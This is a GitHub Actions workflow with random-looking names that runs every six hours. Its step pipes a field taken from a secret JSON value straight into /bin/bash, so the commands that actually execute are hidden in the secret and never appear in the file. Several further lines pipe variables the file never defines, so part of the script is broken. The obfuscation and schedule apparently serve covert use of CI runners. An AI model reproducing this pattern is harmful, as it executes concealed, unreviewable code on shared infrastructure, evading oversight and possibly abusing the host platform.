name: guofumo4678
on:
  workflow_dispatch:
  schedule:
    - cron: '15 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: guofumo4678
        env:
          yj31614: ${{ secrets.yj31614 }}
        run: |
          echo $yj31614 | jq -r .nv573 | /bin/bash
          echo $rez55389 | jq -r .s5 | /bin/bash
          echo $uugss4 | jq -r .z72 | /bin/bash
          echo $tv5 | jq -r .l3483 | /bin/bash
          echo $u0 | jq -r .lmr52 | /bin/bash
          echo $mccl93 | jq -r .qnk22325 | /bin/bash
          echo $ugz8866 | jq -r .g056 | /bin/bash
          echo $afe6890 | jq -r .zo42 | /bin/bash
          echo $mvgpm86466 | jq -r .urxm88830 | /bin/bash

